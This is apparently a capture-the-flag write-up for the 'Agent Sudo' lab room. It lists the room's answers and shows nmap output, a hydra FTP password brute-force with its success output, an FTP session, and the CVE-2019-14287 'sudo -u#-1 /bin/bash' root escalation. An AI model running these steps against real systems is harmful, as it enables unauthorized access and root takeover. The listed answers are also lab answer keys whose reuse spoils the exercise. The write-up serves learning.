Agent Sudo

January 05, 2024

Task 1 Author note

Task 2 Enumerate

user-agent

chris

Task 3 Hash cracking and brute-force

crystal

alien

area51

james

hackerrules!

Task 4 Capture the user flag

b03d975e8c92a7c04146cfa7a5a313c7

Roswell alien autopsy

Task 5 Privilege escalation

CVE-2019-14287

b53a02f55b57d4439e3341834d70c062

deskel

nmap -sC -sV -oN nmap 10.10.84.161 -vv
Starting Nmap 7.93 ( https://nmap.org ) at 2024-01-05 09:23 PST
NSE: Loaded 155 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 09:23
Completed NSE at 09:23, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 09:23
Completed NSE at 09:23, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 09:23
Completed NSE at 09:23, 0.00s elapsed
Initiating Ping Scan at 09:23
Scanning 10.10.84.161 [2 ports]
Completed Ping Scan at 09:23, 0.28s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 09:23
Completed Parallel DNS resolution of 1 host. at 09:23, 1.18s elapsed
Initiating Connect Scan at 09:23
Scanning 10.10.84.161 [1000 ports]
Discovered open port 21/tcp on 10.10.84.161
Discovered open port 80/tcp on 10.10.84.161
Discovered open port 22/tcp on 10.10.84.161
Increasing send delay for 10.10.84.161 from 0 to 5 due to max_successful_tryno increase to 4
Completed Connect Scan at 09:24, 21.51s elapsed (1000 total ports)
Initiating Service scan at 09:24
Scanning 3 services on 10.10.84.161
Completed Service scan at 09:24, 6.65s elapsed (3 services on 1 host)
NSE: Script scanning 10.10.84.161.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 09:24
Completed NSE at 09:24, 10.29s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 09:24
Completed NSE at 09:24, 2.21s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 09:24
Completed NSE at 09:24, 0.00s elapsed
Nmap scan report for 10.10.84.161
Host is up, received syn-ack (0.28s latency).
Scanned at 2024-01-05 09:23:38 PST for 41s
Not shown: 997 closed tcp ports (conn-refused)
PORT   STATE SERVICE REASON  VERSION
21/tcp open  ftp     syn-ack vsftpd 3.0.3
22/tcp open  ssh     syn-ack OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 ef1f5d04d47795066072ecf058f2cc07 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC5hdrxDB30IcSGobuBxhwKJ8g+DJcUO5xzoaZP/vJBtWoSf4nWDqaqlJdEF0Vu7Sw7i0R3aHRKGc5mKmjRuhSEtuKKjKdZqzL3xNTI2cItmyKsMgZz+lbMnc3DouIHqlh748nQknD/28+RXREsNtQZtd0VmBZcY1TD0U4XJXPiwleilnsbwWA7pg26cAv9B7CcaqvMgldjSTdkT1QNgrx51g4IFxtMIFGeJDh2oJkfPcX6KDcYo6c9W1l+SCSivAQsJ1dXgA2bLFkG/wPaJaBgCzb8IOZOfxQjnIqBdUNFQPlwshX/nq26BMhNGKMENXJUpvUTshoJ/rFGgZ9Nj31r
|   256 5e02d19ac4e7430662c19e25848ae7ea (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBHdSVnnzMMv6VBLmga/Wpb94C9M2nOXyu36FCwzHtLB4S4lGXa2LzB5jqnAQa0ihI6IDtQUimgvooZCLNl6ob68=
|   256 2d005cb9fda8c8d880e3924f8b4f18e2 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIOL3wRjJ5kmGs/hI4aXEwEndh81Pm/fvo8EvcpDHR5nt
80/tcp open  http    syn-ack Apache httpd 2.4.29 ((Ubuntu))
|_http-title: Annoucement
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.29 (Ubuntu)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 09:24
Completed NSE at 09:24, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 09:24
Completed NSE at 09:24, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 09:24
Completed NSE at 09:24, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 42.49 seconds

curl -A "C" -L 10.10.84.161
Attention chris, <br><br>

Do you still remember our deal? Please tell agent J about the stuff ASAP. Also, change your god damn password, is weak! <br><br>

From,<br>
Agent R

-A is for spoofing the user agent and -L follow any redirects.

"C" as we know there are 26 letters in alphabets but letter C is we get the right response.

hydra -l chris -P /usr/share/wordlists/rockyou.txt ftp://10.10.92.72
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-01-05 10:45:28
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking ftp://10.10.92.72:21/
[STATUS] 159.00 tries/min, 159 tries in 00:01h, 14344240 to do in 1503:36h, 16 active
[21][ftp] host: 10.10.92.72   login: chris   password: crystal
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2024-01-05 10:47:14

Then we can use hydra to find the password of username chris

After we got the password we can now proceed to ftp

ftp -p 10.10.92.72
Connected to 10.10.92.72.
220 (vsFTPd 3.0.3)
Name (10.10.92.72:kyou): chris
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
227 Entering Passive Mode (10,10,92,72,51,30).
150 Here comes the directory listing.
-rw-r--r--    1 0        0             217 Oct 29  2019 To_agentJ.txt
-rw-r--r--    1 0        0           33143 Oct 29  2019 cute-alien.jpg
-rw-r--r--    1 0        0           34842 Oct 29  2019 cutie.png
226 Directory send OK.

Then we can use binwalk to extract some files in the png

After that we can use zip2john for the zipfile that is located in the _cutie folder

Then just john to crack the hash

After that we can extract password from the cute-alien.jpg

After we use that we can now see the message from that jpg

which is "hackerrules!"

I tried to get the jpg from james directory with python server and wget

python3 -m http.server

wget http://10.10.105.112:8000//Alien_autospy.jpg

I just got the answer when im using OSINT

With just simple command we can priv esc to root.

sudo -u#-1 /bin/bash

Description :
Sudo doesn't check for the existence of the specified user id and executes the with arbitrary user id with the sudo priv
-u#-1 returns as 0 which is root's id

PreviousSource NextRed Team Fundamentals

Last updated 1 year ago

nmap -sC -sV -oN nmap 10.10.84.161 -vv Starting Nmap 7.93 ( https://nmap.org ) at 2024-01-05 09:23 PST NSE: Loaded 155 scripts for scanning. NSE: Script Pre-scanning. NSE: Starting runlevel 1 (of 3) scan. Initiating NSE at 09:23 Completed NSE at 09:23, 0.00s elapsed NSE: Starting runlevel 2 (of 3) scan. Initiating NSE at 09:23 Completed NSE at 09:23, 0.00s elapsed NSE: Starting runlevel 3 (of 3) scan. Initiating NSE at 09:23 Completed NSE at 09:23, 0.00s elapsed Initiating Ping Scan at 09:23 Scanning 10.10.84.161 [2 ports] Completed Ping Scan at 09:23, 0.28s elapsed (1 total hosts) Initiating Parallel DNS resolution of 1 host. at 09:23 Completed Parallel DNS resolution of 1 host. at 09:23, 1.18s elapsed Initiating Connect Scan at 09:23 Scanning 10.10.84.161 [1000 ports] Discovered open port 21/tcp on 10.10.84.161 Discovered open port 80/tcp on 10.10.84.161 Discovered open port 22/tcp on 10.10.84.161 Increasing send delay for 10.10.84.161 from 0 to 5 due to max_successful_tryno increase to 4 Completed Connect Scan at 09:24, 21.51s elapsed (1000 total ports) Initiating Service scan at 09:24 Scanning 3 services on 10.10.84.161 Completed Service scan at 09:24, 6.65s elapsed (3 services on 1 host) NSE: Script scanning 10.10.84.161. NSE: Starting runlevel 1 (of 3) scan. Initiating NSE at 09:24 Completed NSE at 09:24, 10.29s elapsed NSE: Starting runlevel 2 (of 3) scan. Initiating NSE at 09:24 Completed NSE at 09:24, 2.21s elapsed NSE: Starting runlevel 3 (of 3) scan. Initiating NSE at 09:24 Completed NSE at 09:24, 0.00s elapsed Nmap scan report for 10.10.84.161 Host is up, received syn-ack (0.28s latency). Scanned at 2024-01-05 09:23:38 PST for 41s Not shown: 997 closed tcp ports (conn-refused) PORT STATE SERVICE REASON VERSION 21/tcp open ftp syn-ack vsftpd 3.0.3 22/tcp open ssh syn-ack OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 ef1f5d04d47795066072ecf058f2cc07 (RSA) | ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC5hdrxDB30IcSGobuBxhwKJ8g+DJcUO5xzoaZP/vJBtWoSf4nWDqaqlJdEF0Vu7Sw7i0R3aHRKGc5mKmjRuhSEtuKKjKdZqzL3xNTI2cItmyKsMgZz+lbMnc3DouIHqlh748nQknD/28+RXREsNtQZtd0VmBZcY1TD0U4XJXPiwleilnsbwWA7pg26cAv9B7CcaqvMgldjSTdkT1QNgrx51g4IFxtMIFGeJDh2oJkfPcX6KDcYo6c9W1l+SCSivAQsJ1dXgA2bLFkG/wPaJaBgCzb8IOZOfxQjnIqBdUNFQPlwshX/nq26BMhNGKMENXJUpvUTshoJ/rFGgZ9Nj31r | 256 5e02d19ac4e7430662c19e25848ae7ea (ECDSA) | ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBHdSVnnzMMv6VBLmga/Wpb94C9M2nOXyu36FCwzHtLB4S4lGXa2LzB5jqnAQa0ihI6IDtQUimgvooZCLNl6ob68= | 256 2d005cb9fda8c8d880e3924f8b4f18e2 (ED25519) |_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIOL3wRjJ5kmGs/hI4aXEwEndh81Pm/fvo8EvcpDHR5nt 80/tcp open http syn-ack Apache httpd 2.4.29 ((Ubuntu)) |_http-title: Annoucement | http-methods: |_ Supported Methods: GET HEAD POST OPTIONS |_http-server-header: Apache/2.4.29 (Ubuntu) Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel NSE: Script Post-scanning. NSE: Starting runlevel 1 (of 3) scan. Initiating NSE at 09:24 Completed NSE at 09:24, 0.00s elapsed NSE: Starting runlevel 2 (of 3) scan. Initiating NSE at 09:24 Completed NSE at 09:24, 0.00s elapsed NSE: Starting runlevel 3 (of 3) scan. Initiating NSE at 09:24 Completed NSE at 09:24, 0.00s elapsed Read data files from: /usr/bin/../share/nmap Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 42.49 seconds